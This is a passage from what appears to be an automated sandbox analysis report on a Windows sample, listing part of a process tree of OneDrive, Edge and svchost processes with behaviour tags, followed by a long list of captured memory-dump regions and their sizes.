                                                                                                                                                                  C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe /update /peruser /childprocess /extractFilesWithLessThreadCount /renameReplaceOneDriveExe /renameReplaceODSUExe /removeNonCurrentVersions
                                                                                                                                                                  2⤵
                                                                                                                                                                  • Modifies system executable filetype association
                                                                                                                                                                  • Adds Run key to start application
                                                                                                                                                                  • Modifies Internet Explorer settings
                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                  PID:5984
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.160.0808.0002\FileSyncConfig.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.160.0808.0002\FileSyncConfig.exe"
                                                                                                                                                                    3⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                    PID:5228
                                                                                                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                                1⤵
                                                                                                                                                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                PID:5624
                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                1⤵
                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                • Modifies registry class
                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                PID:4440
                                                                                                                                                              • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                1⤵
                                                                                                                                                                • Modifies Internet Explorer settings
                                                                                                                                                                PID:8172
                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                1⤵
                                                                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                PID:6404
                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                1⤵
                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                PID:6184
                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:4812
                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                  1⤵
                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                  PID:5740
                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:3236
                                                                                                                                                                  • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Reader_sl.exe
                                                                                                                                                                    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Reader_sl.exe"
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:6536
                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                      PID:6292
                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                      PID:7884
                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                      PID:504
                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                      PID:7936
                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                      PID:5428
                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                      PID:1576
                                                                                                                                                                    • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                      C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:7600
                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                        PID:4640
                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                        PID:5800

                                                                                                                                                                      Network

                                                                                                                                                                      MITRE ATT&CK Enterprise v6

                                                                                                                                                                      Replay Monitor

                                                                                                                                                                      Loading Replay Monitor...

                                                                                                                                                                      Downloads

                                                                                                                                                                      • memory/360-392-0x000002C273D50000-0x000002C273DC4000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        464KB

                                                                                                                                                                      • memory/648-377-0x00000000001D0000-0x00000000001FF000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        188KB

                                                                                                                                                                      • memory/648-406-0x0000000000400000-0x0000000002B5D000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        39.4MB

                                                                                                                                                                      • memory/756-301-0x0000000000400000-0x0000000000422000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        136KB

                                                                                                                                                                      • memory/756-380-0x0000000004CF0000-0x00000000052F6000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        6.0MB

                                                                                                                                                                      • memory/780-367-0x0000000004AD0000-0x0000000004FCE000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        5.0MB

                                                                                                                                                                      • memory/984-341-0x000001F4D0660000-0x000001F4D06D4000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        464KB

                                                                                                                                                                      • memory/1108-381-0x000002207F220000-0x000002207F294000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        464KB

                                                                                                                                                                      • memory/1260-424-0x000001D844210000-0x000001D844284000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        464KB

                                                                                                                                                                      • memory/1268-409-0x0000028093C40000-0x0000028093CB4000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        464KB

                                                                                                                                                                      • memory/1312-326-0x0000000005740000-0x0000000005741000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/1448-404-0x000001E3EEE00000-0x000001E3EEE74000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        464KB

                                                                                                                                                                      • memory/1488-238-0x0000000000400000-0x000000000046D000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        436KB

                                                                                                                                                                      • memory/1676-337-0x0000000004C00000-0x0000000004C01000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/1864-290-0x0000000000A30000-0x0000000000A31000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/1864-309-0x0000000001140000-0x000000000115E000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        120KB

                                                                                                                                                                      • memory/1864-333-0x000000001B680000-0x000000001B682000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        8KB

                                                                                                                                                                      • memory/1924-411-0x000001F8B6960000-0x000001F8B69D4000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        464KB

                                                                                                                                                                      • memory/2052-347-0x00000000026E0000-0x000000000273F000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        380KB

                                                                                                                                                                      • memory/2052-315-0x00000000040F7000-0x00000000041F8000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        1.0MB

                                                                                                                                                                      • memory/2272-352-0x0000000000400000-0x0000000000414000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        80KB

                                                                                                                                                                      • memory/2424-371-0x000001A7CB660000-0x000001A7CB6D4000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        464KB

                                                                                                                                                                      • memory/2440-365-0x0000000002DA0000-0x0000000002DA1000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/2448-356-0x0000013682560000-0x00000136825D4000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        464KB

                                                                                                                                                                      • memory/2480-319-0x0000000002090000-0x0000000002092000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        8KB

                                                                                                                                                                      • memory/2612-391-0x00000000001E0000-0x00000000001E1000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/2652-431-0x00000166E4500000-0x00000166E4574000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        464KB

                                                                                                                                                                      • memory/2676-429-0x000002188B500000-0x000002188B574000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        464KB

                                                                                                                                                                      • memory/2808-321-0x0000015A769A0000-0x0000015A76A14000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        464KB

                                                                                                                                                                      • memory/2808-393-0x0000015A76400000-0x0000015A7644D000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        308KB

                                                                                                                                                                      • memory/3032-193-0x0000000004680000-0x00000000046C8000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        288KB

                                                                                                                                                                      • memory/3032-198-0x0000000000400000-0x0000000002B6B000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        39.4MB

                                                                                                                                                                      • memory/3040-359-0x0000000001340000-0x0000000001355000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        84KB

                                                                                                                                                                      • memory/3268-217-0x000000001B260000-0x000000001B261000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/3268-246-0x000000001AE40000-0x000000001AE42000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        8KB

                                                                                                                                                                      • memory/3268-211-0x0000000000840000-0x000000000085E000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        120KB

                                                                                                                                                                      • memory/3268-208-0x0000000000230000-0x0000000000231000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/3332-227-0x0000000000550000-0x0000000000551000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/3424-201-0x0000000007C50000-0x0000000007C51000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/3424-199-0x00000000077B0000-0x00000000077B1000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/3424-189-0x00000000047A2000-0x00000000047A3000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/3424-191-0x00000000047A0000-0x00000000047A1000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/3424-223-0x0000000007FF0000-0x0000000007FF1000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/3424-186-0x00000000046A0000-0x00000000046A1000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/3424-195-0x00000000074E0000-0x00000000074E1000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/3424-194-0x0000000006DC0000-0x0000000006DC1000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/3424-467-0x00000000047A3000-0x00000000047A4000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/3424-197-0x0000000007740000-0x0000000007741000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/3424-218-0x0000000007530000-0x0000000007531000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/3424-192-0x0000000007420000-0x0000000007421000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/3424-188-0x0000000006DF0000-0x0000000006DF1000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/3424-261-0x00000000080B0000-0x00000000080B1000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/3424-196-0x00000000076D0000-0x00000000076D1000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/3424-440-0x000000007E910000-0x000000007E911000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/3592-244-0x00000000001E0000-0x00000000001E1000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/4020-297-0x0000000000400000-0x0000000000414000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        80KB

                                                                                                                                                                      • memory/4084-171-0x0000000000240000-0x0000000000241000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/4084-190-0x0000000002320000-0x0000000002322000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        8KB

                                                                                                                                                                      • memory/4084-173-0x0000000000850000-0x0000000000851000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/4084-224-0x000000001BAD0000-0x000000001BAD1000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/4084-185-0x0000000000880000-0x0000000000881000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/4084-180-0x0000000000860000-0x000000000087B000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        108KB

                                                                                                                                                                      • memory/4108-384-0x0000000005810000-0x0000000005811000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/4224-256-0x0000000000520000-0x0000000000521000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/4224-257-0x0000000000530000-0x000000000054B000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        108KB

                                                                                                                                                                      • memory/4224-267-0x000000001ADB0000-0x000000001ADB2000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        8KB

                                                                                                                                                                      • memory/4224-240-0x0000000000010000-0x0000000000011000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/4224-258-0x0000000000560000-0x0000000000561000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/4540-212-0x00000000017A0000-0x00000000017A9000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        36KB

                                                                                                                                                                      • memory/4540-234-0x0000000000400000-0x0000000001788000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        19.5MB

                                                                                                                                                                      • memory/4544-230-0x0000000003490000-0x0000000003561000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        836KB

                                                                                                                                                                      • memory/4544-251-0x0000000000400000-0x00000000017F2000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        19.9MB

                                                                                                                                                                      • memory/4548-250-0x0000000000950000-0x0000000000951000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/4548-266-0x000000001B680000-0x000000001B682000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        8KB

                                                                                                                                                                      • memory/4612-470-0x0000000007253000-0x0000000007254000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/4612-461-0x0000000007254000-0x0000000007256000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        8KB

                                                                                                                                                                      • memory/4612-463-0x0000000007250000-0x0000000007251000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/4612-438-0x0000000002CC0000-0x0000000002E0A000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        1.3MB

                                                                                                                                                                      • memory/4612-468-0x0000000007252000-0x0000000007253000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/4612-460-0x0000000000400000-0x0000000002B6D000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        39.4MB

                                                                                                                                                                      • memory/4636-177-0x0000000000120000-0x0000000000121000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/4636-187-0x000000001AE20000-0x000000001AE22000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        8KB

                                                                                                                                                                      • memory/4936-207-0x0000000000B40000-0x0000000000B41000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/4960-239-0x0000000007CF0000-0x0000000007CF1000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/4960-231-0x00000000017D0000-0x00000000017D4000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        16KB

                                                                                                                                                                      • memory/4960-219-0x0000000000F30000-0x0000000000F31000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/4960-233-0x0000000008150000-0x0000000008151000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/5000-547-0x0000021A0FC90000-0x0000021A0FCAB000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        108KB

                                                                                                                                                                      • memory/5000-549-0x0000021A12400000-0x0000021A12506000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        1.0MB

                                                                                                                                                                      • memory/5000-345-0x0000021A0FE00000-0x0000021A0FE74000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        464KB

                                                                                                                                                                      • memory/5100-306-0x00000000050E0000-0x00000000050E3000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        12KB

                                                                                                                                                                      • memory/5100-289-0x0000000005110000-0x000000000560E000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        5.0MB

                                                                                                                                                                      • memory/5100-268-0x0000000005550000-0x0000000005551000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/5100-285-0x0000000002C50000-0x0000000002C68000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        96KB

                                                                                                                                                                      • memory/5100-252-0x0000000000740000-0x0000000000741000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/5108-134-0x000000006B280000-0x000000006B2A6000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        152KB

                                                                                                                                                                      • memory/5108-169-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        100KB

                                                                                                                                                                      • memory/5108-133-0x000000006FE40000-0x000000006FFC6000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        1.5MB

                                                                                                                                                                      • memory/5108-132-0x000000006B440000-0x000000006B4CF000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        572KB

                                                                                                                                                                      • memory/5108-168-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        100KB

                                                                                                                                                                      • memory/5108-170-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        100KB

                                                                                                                                                                      • memory/5108-165-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        100KB

                                                                                                                                                                      • memory/5216-408-0x00000000052A0000-0x00000000052A1000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/5352-387-0x00000000001E0000-0x00000000001E1000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                      • memory/5492-427-0x0000000004CF0000-0x00000000052F6000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        6.0MB

                                                                                                                                                                      • memory/5724-465-0x0000000000A90000-0x0000000000AD3000-memory.dmp

                                                                                                                                                                        Filesize

                                                                                                                                                                        268KB